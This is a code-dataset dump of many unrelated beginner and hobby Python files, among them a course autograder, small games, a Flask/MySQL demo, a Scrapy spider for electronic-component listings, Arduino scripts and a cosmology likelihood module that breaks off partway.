reference_answers = [(1, 2), (2, 9), (2, 5), (13, 31), (17, 59)]\n\n for (i, m) in enumerate(maps):\n student_answer = map.victimSum(m)\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\n{} map Expected: {} Got: {}\".format(\n map_names[i], reference_answers[i], student_answer\n )\n )\n\n\nclass p4(unittest.TestCase):\n def test(self):\n medium_v4 = readMap.read(os.path.join(\"maps\", \"medium_v4.map\"))\n agent = map.Agent(medium_v4)\n if agent.allVisited():\n raise Exception(\n \"\\nagent.all_visited() returned True but not all victims have been visited yet\"\n )\n agent.move(map.Locn(4, 18))\n agent.move(map.Locn(2, 5))\n agent.move(map.Locn(2, 11))\n agent.move(map.Locn(11, 20))\n agent.move(map.Locn(2, 17))\n agent.move(map.Locn(11, 26))\n agent.move(map.Locn(2, 5))\n\n if not agent.allVisited():\n raise Exception(\n \"\\nagent.all_visited() returned False but all victims have been visited\"\n )\n\n reference_path = [\n map.Locn(16, 6),\n map.Locn(4, 18),\n map.Locn(2, 5),\n map.Locn(2, 11),\n map.Locn(11, 20),\n map.Locn(2, 17),\n map.Locn(11, 26),\n map.Locn(2, 5),\n ]\n if reference_path != agent.path:\n raise Exception(\n \"\\nWrong path\\nExpected: {}\\nGot: {}\".format(reference_path, agent.path)\n )\n","repo_name":"joseppujadas/cmu-07180","sub_path":"07180_Programming_1/autograder.py","file_name":"autograder.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7802816759","text":"import argparse\n\nDIRECTION_FORWARD = 'forward'\nDIRECTION_UP = 'up'\nDIRECTION_DOWN = 'down'\n\n\"\"\"\nAll information and context was taken from https://adventofcode.com/2021/day/1\n\"\"\"\n\n\ndef calculate_x_final_position(directions: list[tuple]) -> int:\n x_position = 0\n for direction, value in directions:\n if direction == DIRECTION_FORWARD:\n x_position += int(value)\n\n print(f\"The horizontal final position is {x_position}\")\n return x_position\n\n\ndef calculate_y_final_position(directions: list[tuple]) -> int:\n y_position = 0\n for direction, value in directions:\n if direction == DIRECTION_UP:\n y_position -= int(value)\n elif direction == DIRECTION_DOWN:\n y_position += int(value)\n\n print(f\"The depth final position is {y_position}\")\n return y_position\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nargs = parser.parse_args()\n\ndirections = None\nwith open(args.input) as file:\n directions = file.read().splitlines()\n directions = [direction.split() for direction in directions]\n\nif directions:\n x_position = 
calculate_x_final_position(directions)\n y_position = calculate_y_final_position(directions)\n result = x_position * y_position\n print(f\"The product from x and y is {result}\")\n","repo_name":"mathiashls/adventofcode-2021","sub_path":"day2/day2_a.py","file_name":"day2_a.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30979862049","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\nimport glob\n\ninteractive_files = []\n\nfor f in glob.glob('src/interactive_interface/dist/**', recursive=True):\n if not Path(f).is_dir():\n interactive_files.append('..' + f[3:])\n\nfor f in glob.glob('src/interactive_interface/lean_server/**', recursive=True):\n if not Path(f).is_dir():\n interactive_files.append('..' + f[3:])\n\n\n\nsetup(\n name='Lean game maker',\n version='0.0.1',\n author='Mohammad Pedramfar',\n author_email='m.pedramfar15@imperial.ac.uk',\n description='A Lean game maker',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n package_data={\n '': ['*.css', '*.css.map', '*.js', 'templates/*'] + interactive_files,\n },\n scripts=['bin/make-lean-game'],\n install_requires=['regex >= 2018.7.11', 'jinja2 >= 2.10', 'mistletoe >= 0.7.1', 'toml >= 0.10.0', 'fire >= 0.1.3', 'jsonpickle >= 1.2', 'polib >= 1.1.0'])\n\n","repo_name":"mpedramfar/Lean-game-maker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"40"} +{"seq_id":"43840848975","text":"from PyQt5.QtCore import Qt,QTime,QTimer\r\nfrom PyQt5.QtWidgets import *\r\nfrom SecondWin import *\r\nfrom FinalWindow import *\r\n \r\napp = QApplication([])\r\n \r\nclass MainWin(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.look()\r\n self.initUI()\r\n self.connect()\r\n \r\n def look(self):\r\n self.setWindowTitle('1st screen')\r\n self.resize(600,400)\r\n \r\n def initUI(self):\r\n self.main_layout = QVBoxLayout()\r\n self.hello_text = QLabel('Hello\\nhello\\nhello')\r\n self.instruction_text = QLabel('Long text')\r\n self.button = QPushButton('Start')\r\n self.main_layout.addWidget(self.hello_text)\r\n self.main_layout.addWidget(self.instruction_text)\r\n self.main_layout.addWidget(self.button, alignment=Qt.AlignCenter)\r\n self.setLayout(self.main_layout)\r\n \r\n def connect(self):\r\n \r\n self.button.clicked.connect(self.next_screen)\r\n \r\n def next_screen(self):\r\n self.hide()\r\n self.second_screen = SecondWin()\r\n self.second_screen.show()\r\n \r\nmain_win = MainWin()\r\nmain_win.show()\r\napp.exec_()","repo_name":"Fiksheid/Rufie","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28575330232","text":"# 🚨 Don't change the code below 👇\nprint(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\").lower()\nname2 = input(\"What is their name? 
\\n\").lower()\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\ntotal_word1 = 0 # Creating this variable for storing total \"TRUE\" word characters\ntotal_word2 = 0 # Creating this variable for storing total \"LOVE\" word characters\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'T' Character in both words and suming the count.\n\nif 't' in name1 or 't' in name2:\n word1 = name1.count('t')\n word2 = name2.count('t')\n total_word1 = word1 + word2\n# print(f\"'T' word count is {word1 + word2}\")\n#else:\n# print(\"'T' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'R' Character in both words and suming the count.\n\nif 'r' in name1 or 'r' in name2:\n word1 = name1.count('r')\n word2 = name2.count('r')\n total_word1 += word1 + word2\n# print(f\"'R' word count is {word1 + word2}\")\n#else:\n# print(\"'R' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'U' Character in both words and suming the count.\n\nif 'u' in name1 or 'u' in name2:\n word1 = name1.count('u')\n word2 = name2.count('u')\n total_word1 += word1 + word2\n# print(f\"'U' word count is {word1 + word2}\")\n#else:\n# print(\"'U' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'e' in name1 or 'e' in name2:\n word1 = name1.count('e')\n word2 = name2.count('e')\n total_word1 += word1 + word2\n# print(f\"'E' word count is {word1 + word2}\")\n#else:\n# print(\"'E' word count is 0\")\n\n#print(f\"Total characts of word 'TRUE' is {total_word1}\") #Printing total \"TRUE\" word characters\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'L' Character in both words and suming the count.\n\nif 'l' in name1 or 'l' in name2:\n word3 = name1.count('l')\n word4 = name2.count('l')\n total_word2 += word3 + word4\n# print(f\"'L' word count is {word3 + word4}\")\n#else:\n# print(\"'L' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'U' Character in both words and suming the count.\n\nif 'o' in name1 or 'o' in name2:\n word3 = name1.count('o')\n word4 = name2.count('o')\n total_word2 += word3 + word4\n# print(f\"'O' word count is {word3 + word4}\")\n#else:\n# print(\"'O' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'v' in name1 or 'v' in name2:\n word3 = name1.count('v')\n word4 = name2.count('v')\n total_word2 += word3 + word4\n# print(f\"'V' word count is {word3 + word4}\")\n#else:\n# print(\"'V' word count is 0\")\n\n#--------------------------------------------------------------------------------\n# This portion calculates the 'E' Character in both words and suming the count.\n\nif 'e' in name1 or 'e' in name2:\n word3 = name1.count('e')\n word4 = name2.count('e')\n total_word2 += word3 + word4\n# print(f\"'U' word count is {word3 + word4}\")\n#else:\n# print(\"'E' word count is 0\")\n\n#print(f\"Total characts of word 'LOVE' is {total_word2}\")\n\n#concatinating total characters of both words to find the score\nstr_love_score = str(total_word1) + 
str(total_word2)\n\n#Converting the score from string to integer for next if condition\nlove_score = int(str_love_score)\n#print(love_score)\n\n#--------------------------------------------------------------------------------\n# If condition to check what's the score for printing the appropriate message\n\nif love_score < 10 or love_score > 90:\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\nelif love_score > 40 and love_score < 50:\n print(f\"Your score is {love_score}, you are alright together.\")\nelse:\n print(f\"Your score is {love_score}.\")","repo_name":"arshah92/Love-Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42114673140","text":"class Character():\r\n def __init__(self,name,health,mana):\r\n self.name = name\r\n self.health = health\r\n self.mana = mana\r\n\r\n def description_character(self):\r\n description = self.name + ' has ' + str(self.health) + ' hp ' + str(self.mana) + ' mana'\r\n print(description)\r\n\r\n\r\nclass warrior (Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.charge = 100\r\n self.rage = 100\r\n\r\n def get_rage(self):\r\n print('rage is ' + str(self.rage))\r\n def get_charge(self):\r\n print('charge is ' + str(self.charge))\r\n\r\nclass mage (Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.fireball = 100\r\n self.ice_spike = 100\r\n\r\n def get_fireball(self):\r\n if self.fireball == 100:\r\n print('fireball is ready')\r\n else:\r\n print('not ready yet')\r\n def get_ice_spike(self):\r\n if self.ice_spike == 100:\r\n print('ice spike is ready')\r\n else:\r\n print('not ready yet')\r\n\r\n\r\nclass archer(Character):\r\n def __init__(self,name,health,mana):\r\n super().__init__(name,health,mana)\r\n self.trippleshot = 100\r\n self.penetration = 100\r\n\r\n def get_trippleshot(self):\r\n if self.trippleshot == 100:\r\n print('trippleshot is ready')\r\n else:\r\n print('not ready yet')\r\n def get_penetration(self):\r\n if self.penetration == 100:\r\n print('penetration is ready')\r\n else:\r\n print('not ready yet')\r\n\r\nwarrior = warrior('Warrior',320,80)\r\nmage = mage('Mage',160,350)\r\narcher = archer('Archer',210,150)\r\n\r\n\r\nwarrior.description_character()\r\nwarrior.get_charge()\r\nwarrior.get_rage()\r\nprint('\\n')\r\n\r\n\r\n\r\nmage.description_character()\r\nmage.get_fireball()\r\nmage.get_ice_spike()\r\nprint('\\n')\r\n\r\n\r\narcher.description_character()\r\narcher.get_trippleshot()\r\narcher.get_penetration()\r\nprint('\\n')\r\n\r\n\r\n","repo_name":"nectarhin/Python-projects","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69829145400","text":"\nBOARD = [\" \"] * 4\nstates = [\"X\", \"O\"]\nstate_index = 0\n\ndef help_info():\n global BOARD\n BOARD = [\"1\", \"2\", \"3\", \"4\"]\n\n print(\"These are the board positions!\")\n display_board()\n BOARD = [\" \"] * 4\n\ndef play(position, board=None, index=None):\n global BOARD, state_index\n if board is None:\n board = BOARD\n\n if index is None:\n index = state_index\n\n board[position] = states[index]\n return board\n\ndef evaluate_board(board, current_state):\n if check_win(board):\n if current_state == \"O\":\n return 1\n\n else:\n 
return -1\n\n if check_full(board):\n return 0\n \n\ndef generator(board, available_positions, local_state_index):\n global states\n\n if check_win(board) or check_full(board):\n # display_board(board)\n return evaluate_board(board, states[(local_state_index + 1) % 2]), None\n\n board_evaluations = []\n positions = []\n\n for position in available_positions:\n new_available_positions = available_positions.copy()\n new_available_positions.remove(position)\n\n new_board = play(position, board.copy(), local_state_index)\n new_iteration = generator(new_board, new_available_positions, (local_state_index + 1) % 2)\n board_evaluations.append(new_iteration[0])\n\n print(board_evaluations, available_positions)\n fun = max if states[local_state_index] == \"O\" else min\n return fun(board_evaluations), available_positions[board_evaluations.index(fun(board_evaluations))]\n\ndef check_win(board=None):\n if board is None:\n board = BOARD\n if board[0] == board[3] and board[0] != \" \":\n return True\n\n elif board[1] == board[2] and board[1] != \" \":\n return True\n\n else:\n return False\n\ndef check_full(board=None):\n if board is None:\n board = BOARD\n return board.count(\" \") == 0\n\ndef display_board(board=None):\n if board is None:\n board = BOARD\n\n print()\n print(f\" {board[0]} | {board[1]} \")\n print(\"--------\")\n print(f\" {board[2]} | {board[3]} \")\n\ndef run_game():\n global BOARD, states, state_index\n\n while True:\n if states[state_index] == \"O\":\n max_value, position = generator(BOARD, [i for i, v in enumerate(BOARD) if v == \" \"], state_index)\n\n else:\n position = input(\"Type your position [1-4]: \")\n try:\n position = int(position) - 1\n\n if position > 3 or position < 0:\n print(\"bad position!\")\n raise\n\n except Exception as e:\n print(e)\n continue\n \n if BOARD[position] != \" \":\n print(\"Position already occupied!\")\n continue\n\n play(position)\n\n state_index = (state_index + 1) % 2\n \n display_board()\n\n win_status = check_win()\n\n if win_status:\n print(f\"{states[(state_index + 1)%2]} won the game\")\n break\n \n if check_full():\n print(\"No winner! it was a Tie!\")\n break\n\n\n\ndef main():\n help_info()\n run_game()\n\n # print(generator(BOARD))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ifeoluwa5983/Computerized-Tic-Tac-Toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8520134764","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture('C2.mp4')\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n if not ret:\n # stop once the video has no more frames\n break\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n cv2.imshow('frame',gray)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"krishnakantkumar0/Simple-Python","sub_path":"40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4765803913","text":"import glob\nimport cv2\nimport random\nimport numpy as np\nimport os\nimport pickle\nfrom PIL import Image\nimport sys\nfrom threading import Thread, RLock\nfrom time import time\n\nrlock = RLock()\nclass OpenImage(Thread):\n \"\"\" Thread for opening images. 
\"\"\"\n def __init__(self, listA):\n global data, imgSize\n Thread.__init__(self)\n self.listA = listA\n self.img, self.value, self.size = None, None, None\n\n def run(self):\n \"\"\" Code to execute to open. \"\"\"\n i = 0\n for elm in self.listA:\n self.value = int(elm.split('\\\\')[1].split('_')[0])\n if self.value == 0:\n self.img = np.array(cv2.resize(cv2.imread(elm, 0), (imgSize,imgSize)))\n with rlock:\n data.append([self.img, [-1,-1,-1,-1,-1]])\n else:\n self.img = np.array(cv2.resize(cv2.imread(elm, 0), (imgSize,imgSize)))\n splited = elm.split('\\\\')[1].split('_')\n self.size = [float(splited[2]),float(splited[3]),float(splited[4]) - float(splited[2]),float(splited[5][:-4]) - float(splited[3]),1.0]\n with rlock:\n data.append([self.img, self.size])\n\nliste = glob.glob('./image/**')\n\nrandom.shuffle(liste)\n#pourcentage d'exemples pour train le modèle\n#pourcentage pour le test 1 - split\nsplit = 0.90\nnbClass = 4\nimgSize = 64\n\ndata = []\n#Chargement en RAM des images trouvées\n# Threads Creation\nt1 = time()\nthreads = []\n\nnbThread = 20\nsize = int(len(liste)/nbThread)\nfor x in range(nbThread):\n threads.append(OpenImage(liste[x*size:(x+1)*size]))\n\n# Lancement des threads\nfor thread in threads:\n thread.start()\n\n\n# Attend que les threads se terminent\nfor thread in threads:\n thread.join()\n\nprint('len de data', len(data), time() - t1)\n\nprint('Chargement en RAM des images done ...')\n#Traitement des images pour l'entrainement du modèle\nX_train = []\ny_train = []\ndata_train = []\nfor elm in data[:int(len(data)*split)]:\n boundingBox = [elm[1][0], 1-elm[1][3], elm[1][2], 1-elm[1][1],elm[1][4]]\n data_train.append([np.flip(elm[0],1), boundingBox])\n data_train.append([elm[0], elm[1]])\n\nprint('Traitement data_train done ...')\n#Traitement des images pour le test du modèle\nX_test = []\ny_test = []\ndata_test = []\nfor elm in data[int(len(data)*split):]:\n boundingBox = [elm[1][0], 1-elm[1][3], elm[1][2], 1-elm[1][1],elm[1][4]]\n data_test.append([np.flip(elm[0],1), boundingBox])\n data_test.append([elm[0], elm[1]])\n\nprint('Traitement data_test done ...')\ndata = 0\nrandom.shuffle(data_test)\nrandom.shuffle(data_train)\n\n\nfor elm in data_train:\n X_train.append(elm[0])\n y_train.append(elm[1])\ndata_train = 0\n\nfor elm in data_test:\n X_test.append(elm[0])\n y_test.append(elm[1])\ndata_test = 0\n\nX_train, y_train, X_test, y_test = np.array(X_train), np.array(y_train), np.array(X_test), np.array(y_test)\nprint('Ready to dump')\n\nsave_dir = './dataTrain/'\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n\n\nnp.save('./dataTrain/Xtest_0', X_test)\nprint(\"Nombres exemples de test\", len(X_test))\nX_test = 0\nnp.save('./dataTrain/Ytest_0', y_test)\ny_test = 0\n\nnp.save('./dataTrain/Ytrain_0', y_train)\ny_train = 0\nnp.save('./dataTrain/Xtrain_0', X_train)\nprint(\"Nombres exemples d'entrainement\", len(X_train))\nX_train = 0\n\n\n\n\n\n","repo_name":"llecorguille/BoundingBoxDetection","sub_path":"dataPickle.py","file_name":"dataPickle.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5201339129","text":"'''\nCreated on Oct 6, 2015\n\n@author: dipkumar.patel\n'''\n\nimport pyttsx\n\ndef text_speech(text):\n engine = pyttsx.init()\n engine.setProperty('rate', 150)\n voice=pyttsx.voice.Voice\n voice.id= 0x0000000002CC9550\n engine.setProperty('voice', voice.id)\n s=text\n engine.say(s)\n 
engine.runAndWait()","repo_name":"kushrami/windows_automation","sub_path":"windows_automation/Text2speech/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"934138389","text":"from flask import Flask, render_template, url_for, redirect\r\nfrom flask_bootstrap import Bootstrap\r\n#from flaskext.mysql import MySQL\r\nfrom flask_mysqldb import MySQL\r\nimport yaml\r\n\r\napp = Flask(__name__)\r\n\r\nbootstrap = Bootstrap(app)\r\n\r\n\r\n\r\n# configure db\r\ndb = yaml.load(open('db.yaml'), Loader=yaml.FullLoader)\r\napp.config['MYSQL_HOST'] = db['mysql_host']\r\napp.config['MYSQL_USER'] = db['mysql_user']\r\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\r\napp.config['MYSQL_DB'] = db['mysql_db']\r\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\r\n\r\nmysql = MySQL(app)\r\n#mysql.init_app(app)\r\n#print(db)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n cur = mysql.connection.cursor()\r\n #cur.execute('''CREATE TABLE example (id INTEGER, name VARCHAR(20))''')\r\n #cur.execute('''INSERT INTO example VALUES(1,'Morenikeji')''')\r\n #cur.execute('''INSERT INTO example VALUES(2,'Ayomide')''')\r\n \r\n if cur.execute('''INSERT INTO example VALUES (3, 'Motune')'''):\r\n mysql.connection.commit() \r\n return 'success', 201\r\n #users = cur.fetchall()\r\n #print(users)\r\n #return 'Done!'\r\n #return users[0]['name']\r\n return render_template('index.html')\r\n #fruits = ['Apple', 'Mango', 'Orange']\r\n #return render_template('index.html',fruits=fruits)\r\n #return redirect(url_for('about'))\r\n\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/css')\r\ndef css():\r\n return render_template('css.html')\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return 'This page was not found!'\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"motunrayokoyejo/Learn-Flask","sub_path":"first_flask_practice/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"11377342469","text":"from pyfirmata import Arduino, util\nimport time\n\nboard = Arduino('/dev/cu.usbmodem1411')\necho_pin = board.get_pin('d:7:i')\ntrig_pin = board.get_pin('d:8:o')\n\n# start a single iterator thread so pin readings keep updating\nit = util.Iterator(board)\nit.start()\n\nwhile True:\n trig_pin.write(False)\n time.sleep(1)\n trig_pin.write(True)\n time.sleep(1)\n \n value = echo_pin.read()\n print(value)\n","repo_name":"chloeleichen/python","sub_path":"firmata/ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36160218408","text":"\"\"\"\nPyDraw threads: use threads to move objects. This runs fine on Windows, provided\ncanvas.update() is not used by another thread (otherwise it exits with a fatal\nerror, some objects start moving as soon as they are drawn, etc.); at least some\ncanvas method calls in tkinter are certainly thread-safe. It is less smooth than\ntime.sleep and is risky overall; the thread is the last piece of code, so that it\nupdates global variables without changing the GUI.\n\"\"\"\n\nimport sys\nimport random\nimport time\nimport _thread as thread\nfrom tkinter import Tk, mainloop\nfrom movingpics import MovingPics, pickUnits, pickDelays\n\n\nclass MovingPicsThreaded(MovingPics):\n def __init__(self, parent=None):\n MovingPics.__init__(self, parent)\n self.mutex = thread.allocate_lock()\n # sys.setcheckinterval(0) # switch after every vm operation: did not help\n\n def onMove(self, event):\n object = self.object\n if object and object not in self.moving:\n msecs = int(pickDelays[0] * 
1000)\n parms = 'Delay=%d msec, Units=%d' % (msecs, pickUnits[0])\n self.setTextInfo(parms)\n # self.mutex.acquire()\n self.moving.append(object)\n # self.mutex.release()\n incrX, reptX, incrY, reptY = self.plotMoves(event)\n thread.start_new_thread(self.doMove, (object, event))\n\n def doMove(self, object, event):\n canvas = event.widget\n incrX, reptX, incrY, reptY = self.plotMoves(event)\n for i in range(reptX):\n canvas.move(object, incrX, 0)\n # canvas.update()\n time.sleep(pickDelays[0]) # this delay can be changed\n for i in range(reptY):\n canvas.move(object, 0, incrY)\n # canvas.update() # update would let other apps run\n time.sleep(pickDelays[0]) # sleep until the next move\n # self.mutex.acquire()\n self.moving.remove(object)\n if self.object == object:\n self.where = event\n # self.mutex.release()\n\nif __name__ == '__main__':\n root = Tk()\n MovingPicsThreaded(root)\n root.mainloop()\n","repo_name":"romanticair/python","sub_path":"basis/progr-py/Gui/MovingPics/movingpics_threads.py","file_name":"movingpics_threads.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24085063868","text":"import scrapy\nfrom ICHQWpro.mysql.mysql_utils.mysql_conf import MySQLS\nfrom ICHQWpro.mysql.mysql_utils.mysql_conn import MysqlPooledDB\n\n\nclass IchqSpider(scrapy.Spider):\n name = 'ichq'\n # allowed_domains = ['www.xx.com']\n # start_urls = ['https://ibsv3.hqew.com/']\n\n def get_data(self):\n sql = \"\"\"\n select model from szlc GROUP BY model;\n \"\"\"\n self.conn, self.cursor = MysqlPooledDB(MySQLS['me']).connect()\n self.cursor.execute(sql)\n data = self.cursor.fetchall()\n return data\n\n def start_requests(self):\n word_list = self.get_data()\n for word in word_list:\n word = word['model']\n url = 'https://s.hqew.com/' + word + '.html'\n yield scrapy.Request(\n url=url,\n callback=self.parse\n )\n\n def parse(self, response,**kwargs):\n tr_list = response.xpath('//div[@id=\"resultList\"]/div/table/tbody/tr[contains(@sid,\"s\")]')\n if tr_list:\n for tr in tr_list:\n item = {}\n item['com_name'] = tr.xpath('./td[@class=\"j-company-td\"]/p/a/@cname').extract_first()\n item['com_name_url'] = tr.xpath('./td[@class=\"j-company-td\"]/p/a/@href').extract_first()\n item['model'] = tr.xpath('./td[@class=\"td-model\"]/div/a[1]/text()').extract_first()\n item['amount'] = tr.xpath('./td[@class=\"td-stockNum\"]/p[1]/text()').extract_first()\n item['brand'] = tr.xpath('./td[@class=\"td-brand\"]/div/@title').extract_first()\n item['batch_num'] = tr.xpath('./td[8]/p/text()').extract_first()\n item['package'] = tr.xpath('./td[9]/p/text()').extract_first()\n item['parameter'] = tr.xpath('./td[@class=\"td-param\"]/div/@title').extract_first()\n item['depot'] = tr.xpath('./td[last()-2]/p/text()').extract_first()\n item['desc_ic'] = tr.xpath('./td[last()-1]/div/@title').extract_first()\n yield item\n\n # pagination: follow the \"next page\" link\n next_url = response.xpath('//a[text()=\"下一页\"]/@href').extract_first()\n if next_url:\n next_url = response.urljoin(next_url)\n yield scrapy.Request(\n url=next_url,\n callback=self.parse\n )\n else:\n print('no results found')","repo_name":"Tao00612/ICHQWpro","sub_path":"ICHQWpro/spiders/ichq.py","file_name":"ichq.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38120502108","text":"#!/usr/bin/env python\n# Resets an Arduino Leonardo connected at 'serialPort' (specified\n# on the command line) to prepare it for a firmware update\n\nimport serial, 
sys\nserialPort = sys.argv[1]\nser = serial.Serial(\n port=serialPort,\n baudrate=1200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS\n)\nser.isOpen()\nser.close()\n","repo_name":"menczel/avrhid","sub_path":"reset_board.py","file_name":"reset_board.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"15828353665","text":"########################################################################\n# Written by Nashwan Sabti - 2021\n# Please cite 2110.XXXX and 2110.XXXX when using this likelihood\n########################################################################\n\nfrom likelihood_class import Likelihood\n\nimport numpy as np\nfrom scipy.interpolate import PchipInterpolator\nfrom scipy.integrate import simps\nfrom scipy.special import erf\n\nclass UVLF_HST_ST_model1_powerspectrum(Likelihood):\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # Define order of Gaussian quadrature integration\n self.points, self.weights = np.polynomial.legendre.leggauss(25)\n self.points_highres, self.weights_highres = np.polynomial.legendre.leggauss(1000)\n \n # Import HST UV LF data and impose 20% minimal error\n minError = 0.2\n self.UVLF_HST = np.loadtxt(data.path[\"data\"]+\"/UVLF/UVLF_HST.txt\")\n self.UVLF_HST[:,4] = np.array(list(map(max,zip(minError*self.UVLF_HST[:,3], self.UVLF_HST[:,4]))))\n self.zs = np.unique(self.UVLF_HST[:,0])\n\n # Beta functions for the dust correction\n betadata = np.loadtxt(data.path[\"data\"]+\"/UVLF/Beta_parameters.txt\", unpack=True)\n self.betainterp = PchipInterpolator(betadata[0], betadata[1])\n self.dbetadMUVinterp = PchipInterpolator(betadata[0], betadata[2])\n\n # Undusting the data\n dust_corr = []\n bin_corr = []\n LF_corr = []\n for item in self.UVLF_HST:\n z, MUV, bin_width = item[0], item[1], item[2]\n new_bin_width = bin_width - self.AUV(z, MUV + bin_width/2) + self.AUV(z, MUV - bin_width/2)\n dust_corr.append(self.AUV(z, MUV))\n bin_corr.append(new_bin_width)\n LF_corr.append(bin_width / new_bin_width)\n\n self.UVLF_HST[:,1] -= np.array(dust_corr)\n self.UVLF_HST[:,2] = np.array(bin_corr)\n self.UVLF_HST[:,3] *= np.array(LF_corr)\n self.UVLF_HST[:,4] *= np.array(LF_corr)\n\n # Halo masses which we integrate over\n self.Mhalos = np.geomspace(1e8, 1e14, 1000)\n\n return\n\n # Beta function for the dust extinction\n def betaAverage(self, z, MUV):\n if MUV < -19.5:\n return self.dbetadMUVinterp(z) * (MUV + 19.5) + self.betainterp(z)\n return (self.betainterp(z) + 2.33) * np.exp((self.dbetadMUVinterp(z) * (MUV + 19.5)) / (self.betainterp(z) + 2.33)) - 2.33\n\n # Dust extinction parameter (only applied at redshifts for which the beta function is measured)\n def AUV(self, z, MUV):\n if z < 2.5 or z > 8:\n return 0.\n\n sigmabeta = 0.34\n return max(0., 4.54 + 0.2 * np.log(10) * (2.07**2) * (sigmabeta**2) + 2.07 * self.betaAverage(z, MUV)) # Overzier 2011\n # return max(0., 4.43 + 0.2 * np.log(10) * (1.99**2) * (sigmabeta**2) + 1.99 * self.betaAverage(z, MUV)) # Meurer 1999\n # return max(0., 3.36 + 0.2 * np.log(10) * (2.04**2) * (sigmabeta**2) + 2.04 * self.betaAverage(z, MUV)) # Casey 2014\n # return max(0., 2.45 + 0.2 * np.log(10) * (1.1**2) * (sigmabeta**2) + 1.1 * self.betaAverage(z, MUV)) # Bouwens 2016\n\n # Comoving radial distance\n def rcomoving(self, z, Omega_m, h):\n return self.c * self.integrator(lambda x: 1/np.sqrt(Omega_m * np.power(1 + x,3) + 
